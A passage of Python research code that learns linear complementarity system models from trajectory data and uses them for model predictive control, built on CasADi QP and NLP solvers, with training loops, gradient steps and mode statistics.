# this is just for testing
dloss2 = jacobian(loss, self.theta) + jacobian(loss, lam_phi) @ dsol_dtheta
self.dloss2_fn = Function('dloss2_fn', [data, self.theta, lam_phi], [dloss2.T])
# compute the second order derivative
dloss_dtheta = jacobian(loss, self.theta).T
ddloss = jacobian(dloss_dtheta, self.theta) + jacobian(dloss_dtheta, lam_phi) @ dsol_dtheta
self.ddloss_fn = Function('ddloss_fn', [data, self.theta, lam_phi], [ddloss])
def compute_lambda(self, x_batch, u_batch, x_next_batch, theta_val):
# prepare the data
batch_size = x_batch.shape[0]
data_batch = np.hstack((x_batch, u_batch, x_next_batch))
theta_val_batch = np.tile(theta_val, (batch_size, 1))
data_theta_batch = np.hstack((data_batch, theta_val_batch))
# compute the lam_phi solution
sol_batch = self.inner_QPSolver(lbx=0.0, p=data_theta_batch.T)
loss_opt_batch = sol_batch['f'].full().flatten()
lam_phi_opt_batch = sol_batch['x'].full().T
return lam_phi_opt_batch, loss_opt_batch
def gradient_step(self, x_batch, u_batch, x_next_batch, theta_val, lam_phi_opt_batch, second_order=False):
batch_size = x_batch.shape[0]
data_batch = np.hstack((x_batch, u_batch, x_next_batch))
theta_val_batch = np.tile(theta_val, (batch_size, 1))
# compute the gradient value
dtheta_batch = self.dloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
dtheta_mean = dtheta_batch.full().mean(axis=1)
# compute the losses
loss_batch = self.loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
dyn_loss_batch = self.dyn_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
lcp_loss_batch = self.lcp_loss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
loss_mean = loss_batch.full().mean()
dyn_loss_mean = dyn_loss_batch.full().mean()
lcp_loss_mean = lcp_loss_batch.full().mean()
dtheta_hessian = dtheta_mean
if second_order is True:
hessian_batch = self.ddloss_fn(data_batch.T, theta_val_batch.T, lam_phi_opt_batch.T)
# compute the mean hessian
hessian_sum = 0
for i in range(batch_size):
hessian_i = hessian_batch[:, i * self.n_theta:(i + 1) * self.n_theta]
hessian_sum += hessian_i
hessian_mean = hessian_sum / batch_size
damping_factor = 1
u, s, vh = np.linalg.svd(hessian_mean)
s = s + damping_factor
damped_hessian = u @ np.diag(s) @ vh
dtheta_hessian = (inv(damped_hessian) @ DM(dtheta_mean)).full().flatten()
return dtheta_mean, loss_mean, dyn_loss_mean, lcp_loss_mean, dtheta_hessian
def dyn_prediction(self, x_batch, u_batch, theta_val):
self.differetiable()
batch_size = x_batch.shape[0]
theta_val_batch = np.tile(theta_val, (batch_size, 1))
xu_theta_batch = np.hstack((x_batch, u_batch, theta_val_batch))
# establish the lcp solver
lcp_loss = dot(self.dist, self.lam)
xu_theta = vertcat(self.x, self.u, self.theta)
quadprog = {'x': self.lam, 'f': lcp_loss, 'g': self.dist, 'p': xu_theta}
opts = {'printLevel': 'none'}
lcp_Solver = qpsol('lcp_solver', 'qpoases', quadprog, opts)
self.lcp_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist, dot(self.dist, self.lam)])
self.lcp_dist_fn = Function('dist_fn', [self.x, self.u, self.lam, self.theta], [self.dist])
# establish the dynamics equation
dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.theta], [self.dyn])
# compute the lam_batch
sol_batch = lcp_Solver(lbx=0., lbg=0., p=xu_theta_batch.T)
lam_opt_batch = sol_batch['x'].full().T
# compute the next state batch
x_next_batch = dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, theta_val_batch.T).full().T
return x_next_batch, lam_opt_batch
# class for using a lcs to do mpc control
class LCS_MPC:
def __init__(self, A, B, C, D, E, F, lcp_offset):
self.A = DM(A)
self.B = DM(B)
self.C = DM(C)
self.D = DM(D)
self.E = DM(E)
self.F = DM(F)
self.lcp_offset = DM(lcp_offset)
self.n_state = self.A.shape[0]
self.n_control = self.B.shape[1]
self.n_lam = self.C.shape[1]
# define the system variable
x = casadi.MX.sym('x', self.n_state)
u = casadi.MX.sym('u', self.n_control)
xu_pair = vertcat(x, u)
lam = casadi.MX.sym('lam', self.n_lam)
# dynamics
dyn = self.A @ x + self.B @ u + self.C @ lam
self.dyn_fn = Function('dyn_fn', [xu_pair, lam], [dyn])
# loss function
lcp_loss = dot(self.D @ x + self.E @ u + self.F @ lam + self.lcp_offset, lam)
# constraints
dis_cstr = self.D @ x + self.E @ u + self.F @ lam + self.lcp_offset
lam_cstr = lam
total_cstr = vertcat(dis_cstr, lam_cstr)
self.dis_cstr_fn = Function('dis_cstr_fn', [lam, xu_pair], [dis_cstr])
# establish the qp solver to solve for LCP
quadprog = {'x': lam, 'f': lcp_loss, 'g': total_cstr, 'p': xu_pair}
opts = {'printLevel': 'none', }
self.lcpSolver = qpsol('S', 'qpoases', quadprog, opts)
def forward(self, x_t, u_t):
xu_pair = vertcat(DM(x_t), DM(u_t))
sol = self.lcpSolver(p=xu_pair, lbg=0.)
lam_t = sol['x'].full().flatten()
x_next = self.dyn_fn(xu_pair, lam_t).full().flatten()
return x_next, lam_t
def oc_setup(self, mpc_horizon):
self.mpc_horizon = mpc_horizon
# set the cost function parameters
Q = MX.sym('Q', self.n_state, self.n_state)
R = MX.sym('R', self.n_control, self.n_control)
QN = MX.sym('QN', self.n_state, self.n_state)
# define the parameters
oc_parameters = vertcat(vec(Q), vec(R), vec(QN))
# Start with an empty NLP
w = []
w0 = []
lbw = []
ubw = []
J = 0
g = []
lbg = []
ubg = []
# "Lift" initial conditions
Xk = casadi.MX.sym('X0', self.n_state)
w += [Xk]
lbw += np.zeros(self.n_state).tolist()
ubw += np.zeros(self.n_state).tolist()
w0 += np.zeros(self.n_state).tolist()
# formulate the NLP
for k in range(self.mpc_horizon):
# New NLP variable for the control
Uk = casadi.MX.sym('U_' + str(k), self.n_control)
w += [Uk]
lbw += self.n_control * [-inf]
ubw += self.n_control * [inf]
w0 += self.n_control * [0.]
# new NLP variable for the complementarity variable
Lamk = casadi.MX.sym('lam' + str(k), self.n_lam)
w += [Lamk]
lbw += self.n_lam * [0.]
ubw += self.n_lam * [inf]
w0 += self.n_lam * [0.]
# Add complementarity equation
g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
lbg += self.n_lam * [0.]
ubg += self.n_lam * [inf]
g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
lbg += [0.]
ubg += [0.]
# Integrate till the end of the interval
Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
Ck = dot(Xk, Q @ Xk) + dot(Uk, R @ Uk)
J = J + Ck
# New NLP variable for state at end of interval
Xk = casadi.MX.sym('X_' + str(k + 1), self.n_state)
w += [Xk]
lbw += self.n_state * [-inf]
ubw += self.n_state * [inf]
w0 += self.n_state * [0.]
# Add constraint for the dynamics
g += [Xnext - Xk]
lbg += self.n_state * [0.]
ubg += self.n_state * [0.]
# Add the final cost
J = J + dot(Xk, QN @ Xk)
# Create an NLP solver and solve
opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': oc_parameters}
self.solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
self.lbw = DM(lbw)
self.ubw = DM(ubw)
self.lbg = DM(lbg)
self.ubg = DM(ubg)
self.w0 = DM(w0)
def mpc(self, init_state, mat_Q, mat_R, mat_QN, init_guess=None):
if init_guess is not None:
self.w0 = init_guess['w_opt']
# construct the parameter vector
oc_parameters = vertcat(vec(mat_Q), vec(mat_R), vec(mat_QN))
self.lbw[0:self.n_state] = DM(init_state)
self.ubw[0:self.n_state] = DM(init_state)
self.w0[0:self.n_state] = DM(init_state)
# Solve the NLP
sol = self.solver(x0=self.w0, lbx=self.lbw, ubx=self.ubw, lbg=self.lbg, ubg=self.ubg, p=oc_parameters)
w_opt = sol['x']
cost_opt = sol['f']
# extract the optimal control and state
sol_traj = w_opt[0:self.mpc_horizon * (self.n_state + self.n_control + self.n_lam)].reshape(
(self.n_state + self.n_control + self.n_lam, -1))
x_traj = casadi.horzcat(sol_traj[0:self.n_state, :],
w_opt[self.mpc_horizon * (self.n_state + self.n_control + self.n_lam):]).T
u_traj = sol_traj[self.n_state:self.n_state + self.n_control, :].T
lam_traj = sol_traj[self.n_state + self.n_control:, :].T
opt_sol = {'state_traj_opt': x_traj.full(),
'control_traj_opt': u_traj.full(),
'lam_traj_opt': lam_traj.full(),
'w_opt': w_opt,
'cost_opt': cost_opt,
}
return opt_sol
# class for learning LCS from the hybrid data
class LCS_learner_regression:
def __init__(self, n_state, n_control, n_lam,
A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
stiffness=0.):
self.n_lam = n_lam
self.n_state = n_state
self.n_control = n_control
self.lam = SX.sym('lam', self.n_lam)
self.x = SX.sym('x', self.n_state)
self.u = SX.sym('u', self.n_control)
self.theta = []
self.lcp_theta = []
self.dyn_theta = []
if A is None:
self.A = SX.sym('A', self.n_state, self.n_state)
self.theta += [vec(self.A)]
self.dyn_theta += [vec(self.A)]
else:
self.A = DM(A)
if B is None:
self.B = SX.sym('B', self.n_state, self.n_control)
self.theta += [vec(self.B)]
self.dyn_theta += [vec(self.B)]
else:
self.B = DM(B)
if C is None:
self.C = SX.sym('C', self.n_state, self.n_lam)
self.theta += [vec(self.C)]
self.dyn_theta += [vec(self.C)]
else:
self.C = DM(C)
if D is None:
self.D = SX.sym('D', self.n_lam, self.n_state)
self.theta += [vec(self.D)]
self.lcp_theta += [vec(self.D)]
else:
self.D = DM(D)
if E is None:
self.E = SX.sym('E', self.n_lam, self.n_control)
self.theta += [vec(self.E)]
self.lcp_theta += [vec(self.E)]
else:
self.E = DM(E)
if G is None:
self.G = SX.sym('G', self.n_lam, self.n_lam)
self.theta += [vec(self.G)]
self.lcp_theta += [vec(self.G)]
else:
self.G = DM(G)
if H is None:
self.H = SX.sym('H', self.n_lam, self.n_lam)
self.theta += [vec(self.H)]
self.lcp_theta += [vec(self.H)]
else:
self.H = DM(H)
if lcp_offset is None:
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.theta += [vec(self.lcp_offset)]
self.lcp_theta += [vec(self.lcp_offset)]
else:
self.lcp_offset = DM(lcp_offset)
self.theta = vcat(self.theta)
self.lcp_theta = vcat(self.lcp_theta)
self.dyn_theta = vcat(self.dyn_theta)
self.n_theta = self.theta.numel()
self.n_lcp_theta = self.lcp_theta.numel()
self.n_dyn_theta = self.dyn_theta.numel()
self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
self.F_fn = Function('F_fn', [self.lcp_theta], [self.F])
self.D_fn = Function('D_fn', [self.lcp_theta], [self.D])
self.E_fn = Function('E_fn', [self.lcp_theta], [self.E])
self.G_fn = Function('G_fn', [self.lcp_theta], [self.G])
self.H_fn = Function('H_fn', [self.lcp_theta], [self.H])
self.A_fn = Function('A_fn', [self.dyn_theta], [self.A])
self.B_fn = Function('B_fn', [self.dyn_theta], [self.B])
self.C_fn = Function('C_fn', [self.dyn_theta], [self.C])
self.lcp_offset_fn = Function('lcp_offset_fn', [self.lcp_theta], [self.lcp_offset])
self.val_lcp_theta = 0.1 * np.random.randn(self.n_lcp_theta)
self.val_dyn_theta = 0.1 * np.random.randn(self.n_dyn_theta)
def differetiable(self):
# lcp loss
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
lcp_data_theta = vertcat(self.x, self.u, self.lcp_theta)
self.lcp_loss = dot(self.dist, self.lam)
quadprog = {'x': self.lam, 'f': self.lcp_loss, 'g': self.dist, 'p': lcp_data_theta}
opts = {'printLevel': 'none', }
self.lcp_Solver = qpsol('lcp_Solver', 'qpoases', quadprog, opts)
# define the dynamics loss
self.x_next = SX.sym('x_next', self.n_state)
data = vertcat(self.x, self.u, self.x_next)
self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
self.dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
self.dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.dyn_theta], [self.dyn])
# define the dynamics loss with respect to the lam variable
self.dloss_dlam = jacobian(self.dyn_loss, self.lam)
# define the gradient of lam with respect to lcp_theta
g = diag(self.lam) @ self.dist
dg_dlam = jacobian(g, self.lam)
dg_dlcp = jacobian(g, self.lcp_theta)
self.dlam_dlcp = -inv(dg_dlam) @ dg_dlcp
self.dloss_dlcp = (self.dloss_dlam @ self.dlam_dlcp).T
# assemble functions
data = vertcat(self.x, self.u, self.x_next)
self.dloss_dlcp_fn = Function('dloss_dlcp_fn', [data, self.lam, self.dyn_theta, self.lcp_theta],
[self.dloss_dlcp])
def compute_lambda(self, x_batch, u_batch):
self.differetiable()
# prepare the data
batch_size = x_batch.shape[0]
lcp_data_batch = np.hstack((x_batch, u_batch))
lcp_theta_batch = np.tile(self.val_lcp_theta, (batch_size, 1))
lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
# compute the lam solution
sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
lcp_loss_opt_batch = sol_batch['f'].full().flatten()
lam_opt_batch = sol_batch['x'].full().T
return lam_opt_batch, lcp_loss_opt_batch
def dyn_regression(self, x_batch, u_batch, lam_opt_batch, x_next_batch):
# prepare the data
batch_size = x_batch.shape[0]
I = np.eye(self.n_state)
kron_x = np.kron(x_batch, I)
kron_u = np.kron(u_batch, I)
kron_lam_opt = np.kron(lam_opt_batch, I)
kron_x_next = x_next_batch.flatten()
mat_A = np.hstack((kron_x, kron_u, kron_lam_opt))
vec_b = kron_x_next
# do the regression for dyn_theta
dyn_theta_opt = inv(mat_A.T @ mat_A) @ (mat_A.T @ vec_b)
dyn_loss_opt = dot(mat_A @ dyn_theta_opt - vec_b, mat_A @ dyn_theta_opt - vec_b) / batch_size
self.val_dyn_theta = dyn_theta_opt.full().flatten()
return dyn_loss_opt
def gradient_step(self, x_batch, u_batch, x_next_batch, lam_opt_batch):
batch_size = x_batch.shape[0]
data_batch = np.hstack((x_batch, u_batch, x_next_batch))
dyn_theta_opt_batch = np.tile(self.val_dyn_theta, (batch_size, 1))
lcp_theta_batch = np.tile(self.val_lcp_theta, (batch_size, 1))
# compute the gradient value
dlcp = self.dloss_dlcp_fn(data_batch.T, lam_opt_batch.T, dyn_theta_opt_batch.T, lcp_theta_batch.T)
dlcp_mean = dlcp.full().mean(axis=1)
return dlcp_mean.flatten()
def dyn_prediction(self, x_batch, u_batch):
self.differetiable()
# prepare the data
batch_size = x_batch.shape[0]
lcp_data_batch = np.hstack((x_batch, u_batch))
lcp_theta_batch = np.tile(self.val_lcp_theta, (batch_size, 1))
lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
# compute the lam solution
sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
lam_opt_batch = sol_batch['x'].full().T
# compute the next state batch
dyn_theta_op_batch = np.tile(self.val_dyn_theta, (batch_size, 1))
x_next_batch = self.dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, dyn_theta_op_batch.T).full().T
return x_next_batch, lam_opt_batch
def sim_dyn(self, init_x_batch, control_traj_batch):
self.differetiable()
batch_size = init_x_batch.shape[0]
state_traj_batch = []
lam_traj_batch = []
for i in range(batch_size):
init_x = init_x_batch[i]
control_traj = control_traj_batch[i]
state_traj = [init_x]
lam_traj = []
control_horizon = control_traj.shape[0]
for t in range(control_horizon):
curr_x = state_traj[-1]
curr_u = control_traj[t]
curr_lcp_data_theta = np.hstack((curr_x, curr_u, self.val_lcp_theta))
curr_sol = self.lcp_Solver(lbx=0.0, lbg=0.0, p=curr_lcp_data_theta)
curr_lam = curr_sol['x'].full().flatten()
next_x = self.dyn_fn(curr_x, curr_u, curr_lam, self.val_dyn_theta).full().flatten()
state_traj += [next_x]
lam_traj += [curr_lam]
state_traj = np.array(state_traj)
lam_traj = np.array(lam_traj)
state_traj_batch += [state_traj]
lam_traj_batch += [lam_traj]
return state_traj_batch, lam_traj_batch
def computeLCSMats(self, compact=True):
A = self.A_fn(self.val_dyn_theta).full()
B = self.B_fn(self.val_dyn_theta).full()
C = self.C_fn(self.val_dyn_theta).full()
D = self.D_fn(self.val_lcp_theta).full()
E = self.E_fn(self.val_lcp_theta).full()
F = self.F_fn(self.val_lcp_theta).full()
G = self.G_fn(self.val_lcp_theta).full()
H = self.H_fn(self.val_lcp_theta).full()
lcp_offset = self.lcp_offset_fn(self.val_lcp_theta).full()
lcs_theta = vertcat(vec(A), vec(B), vec(C),
vec(D), vec(E), vec(F),
vec(lcp_offset))
# return lcs_theta, A, B, C, D, E, F, lcp_offset
if compact is True:
return lcs_theta
else:
return {'A': A,
'B': B,
'C': C,
'D': D,
'E': E,
'F': F,
'G': G,
'H': H,
'lcp_offset': lcp_offset,
}
def dyn_step(self, x_batch, u_batch):
self.differetiable()
if type(x_batch) is np.ndarray:
x_batch = [x_batch]
u_batch = [u_batch]
batch_size = len(x_batch)
next_x_batch = []
lam_batch = []
for i in range(batch_size):
x = x_batch[i]
u = u_batch[i]
lcp_data_theta = np.hstack((x, u, self.val_lcp_theta))
# compute the lam value
sol = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta)
lam = sol['x'].full().flatten()
# compute the next state
next_x = self.dyn_fn(x, u, lam, self.val_dyn_theta).full().flatten()
# store
next_x_batch += [next_x]
lam_batch += [lam]
return next_x_batch, lam_batch
def dynamics_step(self, curr_x, curr_u):
self.differetiable()
lcp_data_theta = np.hstack((curr_x, curr_u, self.val_lcp_theta))
# compute the lam value
sol = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta)
curr_lam = sol['x'].full().flatten()
# compute the next state
next_x = self.dyn_fn(curr_x, curr_u, curr_lam, self.val_dyn_theta).full().flatten()
return next_x, curr_lam
# class for learning LCS from the hybrid data (backup)
class LCS_learner_regression_backup:
def __init__(self, n_state, n_control, n_lam,
A=None, B=None, C=None, D=None, E=None, G=None, H=None, lcp_offset=None,
stiffness=0.):
self.n_lam = n_lam
self.n_state = n_state
self.n_control = n_control
self.lam = SX.sym('lam', self.n_lam)
self.x = SX.sym('x', self.n_state)
self.u = SX.sym('u', self.n_control)
self.theta = []
self.lcp_theta = []
self.dyn_theta = []
if A is None:
self.A = SX.sym('A', self.n_state, self.n_state)
self.theta += [vec(self.A)]
self.dyn_theta += [vec(self.A)]
else:
self.A = DM(A)
if B is None:
self.B = SX.sym('B', self.n_state, self.n_control)
self.theta += [vec(self.B)]
self.dyn_theta += [vec(self.B)]
else:
self.B = DM(B)
if C is None:
self.C = SX.sym('C', self.n_state, self.n_lam)
self.theta += [vec(self.C)]
self.dyn_theta += [vec(self.C)]
else:
self.C = DM(C)
if D is None:
self.D = SX.sym('D', self.n_lam, self.n_state)
self.theta += [vec(self.D)]
self.lcp_theta += [vec(self.D)]
else:
self.D = DM(D)
if E is None:
self.E = SX.sym('E', self.n_lam, self.n_control)
self.theta += [vec(self.E)]
self.lcp_theta += [vec(self.E)]
else:
self.E = DM(E)
if G is None:
self.G = SX.sym('G', self.n_lam, self.n_lam)
self.theta += [vec(self.G)]
self.lcp_theta += [vec(self.G)]
else:
self.G = DM(G)
if H is None:
self.H = SX.sym('H', self.n_lam, self.n_lam)
self.theta += [vec(self.H)]
self.lcp_theta += [vec(self.H)]
else:
self.H = DM(H)
if lcp_offset is None:
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.theta += [vec(self.lcp_offset)]
self.lcp_theta += [vec(self.lcp_offset)]
else:
self.lcp_offset = DM(lcp_offset)
self.theta = vcat(self.theta)
self.lcp_theta = vcat(self.lcp_theta)
self.dyn_theta = vcat(self.dyn_theta)
self.n_theta = self.theta.numel()
self.n_lcp_theta = self.lcp_theta.numel()
self.n_dyn_theta = self.dyn_theta.numel()
self.F = stiffness * np.eye(self.n_lam) + self.G @ self.G.T + self.H - self.H.T
self.F_fn = Function('F_fn', [self.lcp_theta], [self.F])
self.D_fn = Function('D_fn', [self.lcp_theta], [self.D])
self.E_fn = Function('E_fn', [self.lcp_theta], [self.E])
self.G_fn = Function('G_fn', [self.lcp_theta], [self.G])
self.H_fn = Function('H_fn', [self.lcp_theta], [self.H])
self.A_fn = Function('A_fn', [self.dyn_theta], [self.A])
self.B_fn = Function('B_fn', [self.dyn_theta], [self.B])
self.C_fn = Function('C_fn', [self.dyn_theta], [self.C])
self.lcp_offset_fn = Function('lcp_offset_fn', [self.lcp_theta], [self.lcp_offset])
def differetiable(self):
# lcp loss
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
lcp_data_theta = vertcat(self.x, self.u, self.lcp_theta)
self.lcp_loss = dot(self.dist, self.lam)
quadprog = {'x': self.lam, 'f': self.lcp_loss, 'g': self.dist, 'p': lcp_data_theta}
opts = {'printLevel': 'none', }
self.lcp_Solver = qpsol('lcp_Solver', 'qpoases', quadprog, opts)
# define the dynamics loss
self.x_next = SX.sym('x_next', self.n_state)
data = vertcat(self.x, self.u, self.x_next)
self.dyn = self.A @ self.x + self.B @ self.u + self.C @ self.lam
self.dyn_loss = dot(self.dyn - self.x_next, self.dyn - self.x_next)
self.dyn_fn = Function('dyn_fn', [self.x, self.u, self.lam, self.dyn_theta], [self.dyn])
# define the dynamics loss with respect to the lam variable
self.dloss_dlam = jacobian(self.dyn_loss, self.lam)
# define the gradient of lam with respect to lcp_theta
g = diag(self.lam) @ self.dist
dg_dlam = jacobian(g, self.lam)
dg_dlcp = jacobian(g, self.lcp_theta)
self.dlam_dlcp = -inv(dg_dlam) @ dg_dlcp
self.dloss_dlcp = (self.dloss_dlam @ self.dlam_dlcp).T
# assemble functions
data = vertcat(self.x, self.u, self.x_next)
self.dloss_dlcp_fn = Function('dloss_dlcp_fn', [data, self.lam, self.dyn_theta, self.lcp_theta],
[self.dloss_dlcp])
def compute_lambda(self, x_batch, u_batch, lcp_theta):
self.differetiable()
# prepare the data
batch_size = x_batch.shape[0]
lcp_data_batch = np.hstack((x_batch, u_batch))
lcp_theta_batch = np.tile(lcp_theta, (batch_size, 1))
lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
# compute the lam solution
sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
lcp_loss_opt_batch = sol_batch['f'].full().flatten()
lam_opt_batch = sol_batch['x'].full().T
return lam_opt_batch, lcp_loss_opt_batch
def dyn_regression(self, x_batch, u_batch, lam_opt_batch, x_next_batch):
# prepare the data
batch_size = x_batch.shape[0]
I = np.eye(self.n_state)
kron_x = np.kron(x_batch, I)
kron_u = np.kron(u_batch, I)
kron_lam_opt = np.kron(lam_opt_batch, I)
kron_x_next = x_next_batch.flatten()
mat_A = np.hstack((kron_x, kron_u, kron_lam_opt))
vec_b = kron_x_next
# do the regression for dyn_theta
dyn_theta_opt = inv(mat_A.T @ mat_A) @ (mat_A.T @ vec_b)
dyn_loss_opt = dot(mat_A @ dyn_theta_opt - vec_b, mat_A @ dyn_theta_opt - vec_b) / batch_size
return dyn_theta_opt.full().flatten(), dyn_loss_opt
def gradient_step(self, x_batch, u_batch, x_next_batch, lam_opt_batch, dyn_theta_opt, lcp_theta):
batch_size = x_batch.shape[0]
data_batch = np.hstack((x_batch, u_batch, x_next_batch))
dyn_theta_opt_batch = np.tile(dyn_theta_opt, (batch_size, 1))
lcp_theta_batch = np.tile(lcp_theta, (batch_size, 1))
# compute the gradient value
dlcp = self.dloss_dlcp_fn(data_batch.T, lam_opt_batch.T, dyn_theta_opt_batch.T, lcp_theta_batch.T)
dlcp_mean = dlcp.full().mean(axis=1)
return dlcp_mean.flatten()
def dyn_prediction(self, x_batch, u_batch, dyn_theta_opt, lcp_theta):
self.differetiable()
# prepare the data
batch_size = x_batch.shape[0]
lcp_data_batch = np.hstack((x_batch, u_batch))
lcp_theta_batch = np.tile(lcp_theta, (batch_size, 1))
lcp_data_theta_batch = np.hstack((lcp_data_batch, lcp_theta_batch))
# compute the lam solution
sol_batch = self.lcp_Solver(lbx=0.0, lbg=0.0, p=lcp_data_theta_batch.T)
lam_opt_batch = sol_batch['x'].full().T
# compute the next state batch
dyn_theta_op_batch = np.tile(dyn_theta_opt, (batch_size, 1))
x_next_batch = self.dyn_fn(x_batch.T, u_batch.T, lam_opt_batch.T, dyn_theta_op_batch.T).full().T
return x_next_batch, lam_opt_batch
# do statistics for the modes
def statiModes(lam_batch, tol=1e-5):
# dimension of the lambda
n_lam = lam_batch.shape[1]
# total number of modes
total_n_mode = float(2 ** n_lam)
# do the statistics for the modes
lam_batch_mode = np.where(lam_batch < tol, 0, 1)
unique_mode_list, mode_count_list = np.unique(lam_batch_mode, axis=0, return_counts=True)
mode_frequency_list = mode_count_list / lam_batch.shape[0]
return unique_mode_list, mode_frequency_list
# do the plot of differnet mode
def plotModes(lam_batch, tol=1e-5):
# do the statistics for the modes
lam_batch_mode = np.where(lam_batch < tol, 0, 1)
unique_mode_list, mode_indices = np.unique(lam_batch_mode, axis=0, return_inverse=True)
return unique_mode_list, mode_indices
# generate the random control sequence
def randomControlTraj(traj_count, horizon, n_control):
res = []
for i in range(traj_count):
single_traj = np.random.randn(horizon, n_control)
res += [single_traj]
return res
# learn a lcs model from the sampled data using regression algorithms
def LCSRegressionBuffer(lcs_learner, optimizier,
curr_control_traj_batch, curr_true_state_traj_batch,
prev_control_traj_batch, prev_true_state_traj_batch,
buffer_ratio=0.5,
minibatch_size=200, max_iter=5000, print_level=0):
# converting the data form
curr_batch_size = len(curr_control_traj_batch)
curr_train_u_batch = []
curr_train_x_batch = []
curr_train_x_next_batch = []
for i in range(curr_batch_size):
curr_train_u_batch += [curr_control_traj_batch[i]]
curr_train_x_batch += [curr_true_state_traj_batch[i][0:-1]]
curr_train_x_next_batch += [curr_true_state_traj_batch[i][1:]]
curr_train_u_batch = np.vstack(curr_train_u_batch)
curr_train_x_next_batch = np.vstack(curr_train_x_next_batch)
curr_train_x_batch = np.vstack(curr_train_x_batch)
curr_train_data_size = curr_train_u_batch.shape[0]
curr_minibatch_size = int((1 - buffer_ratio) * minibatch_size)
# converting the data form
prev_batch_size = len(prev_control_traj_batch)
if prev_batch_size is not 0:
prev_train_u_batch = []
prev_train_x_batch = []
prev_train_x_next_batch = []
for i in range(prev_batch_size):
prev_train_u_batch += [prev_control_traj_batch[i]]
prev_train_x_batch += [prev_true_state_traj_batch[i][0:-1]]
prev_train_x_next_batch += [prev_true_state_traj_batch[i][1:]]
prev_train_u_batch = np.vstack(prev_train_u_batch)
prev_train_x_next_batch = np.vstack(prev_train_x_next_batch)
prev_train_x_batch = np.vstack(prev_train_x_batch)
prev_train_data_size = prev_train_u_batch.shape[0]
prev_minibatch_size = minibatch_size - curr_minibatch_size
else:
curr_minibatch_size = minibatch_size
prev_minibatch_size = 0
print('current_data points:', curr_minibatch_size, '| history data points:', prev_minibatch_size)
for k in range(max_iter):
# mini batch dataset for current training data set
curr_shuffle_index = np.random.permutation(curr_train_data_size)[0:curr_minibatch_size]
curr_x_minibatch = curr_train_x_batch[curr_shuffle_index]
curr_u_minibatch = curr_train_u_batch[curr_shuffle_index]
curr_x_next_minibatch = curr_train_x_next_batch[curr_shuffle_index]
# mini batch dataset for the previous training data set
if prev_batch_size is not 0:
prev_shuffle_index = np.random.permutation(prev_train_data_size)[0:prev_minibatch_size]
prev_x_minibatch = prev_train_x_batch[prev_shuffle_index]
prev_u_minibatch = prev_train_u_batch[prev_shuffle_index]
prev_x_next_minibatch = prev_train_x_next_batch[prev_shuffle_index]
x_minibatch = np.vstack((curr_x_minibatch, prev_x_minibatch))
u_minibatch = np.vstack((curr_u_minibatch, prev_u_minibatch))
x_next_minibatch = np.vstack((curr_x_next_minibatch, prev_x_next_minibatch))
else:
x_minibatch = curr_x_minibatch
u_minibatch = curr_u_minibatch
x_next_minibatch = curr_x_next_minibatch
# compute the lambda batch
lam_opt_mini_batch, loss_opt_mini_batch = lcs_learner.compute_lambda(x_minibatch, u_minibatch)
# regression for the dynamics
dyn_loss_opt = lcs_learner.dyn_regression(x_minibatch, u_minibatch, lam_opt_mini_batch, x_next_minibatch)
# compute the gradient
dlcp_theta = lcs_learner.gradient_step(x_minibatch, u_minibatch, x_next_minibatch, lam_opt_mini_batch)
# store and update
lcs_learner.val_lcp_theta = optimizier.step(lcs_learner.val_lcp_theta, dlcp_theta)
if print_level is not 0:
if k % 100 == 0:
# on the prediction using the current learned lcs
pred_x_next_batch, pred_lam_batch = lcs_learner.dyn_prediction(curr_train_x_batch, curr_train_u_batch)
# compute the prediction error
error_x_next_batch = pred_x_next_batch - curr_train_x_next_batch
relative_error = (
la.norm(error_x_next_batch, axis=1) / (
la.norm(curr_train_x_next_batch, axis=1) + 0.0001)).mean()
print(
'lcs learning iter', k,
'| loss:', dyn_loss_opt,
'| grad:', norm_2(dlcp_theta),
'| PRE:', relative_error,
)
# learn a lcs model from the sampled data using regression algorithms without previous
def LCSLearningRegression(lcs_learner, optimizier, control_traj_batch, true_state_traj_batch,
max_iter=5000, minibatch_size=100, print_level=0):
# converting the data form
batch_size = len(control_traj_batch)
train_u_batch = []
train_x_batch = []
train_x_next_batch = []
for i in range(batch_size):
train_u_batch += [control_traj_batch[i]]
train_x_batch += [true_state_traj_batch[i][0:-1]]
train_x_next_batch += [true_state_traj_batch[i][1:]]
train_u_batch = np.vstack(train_u_batch)
train_x_next_batch = np.vstack(train_x_next_batch)
train_x_batch = np.vstack(train_x_batch)
# do the learning iteration
train_data_size = train_u_batch.shape[0]
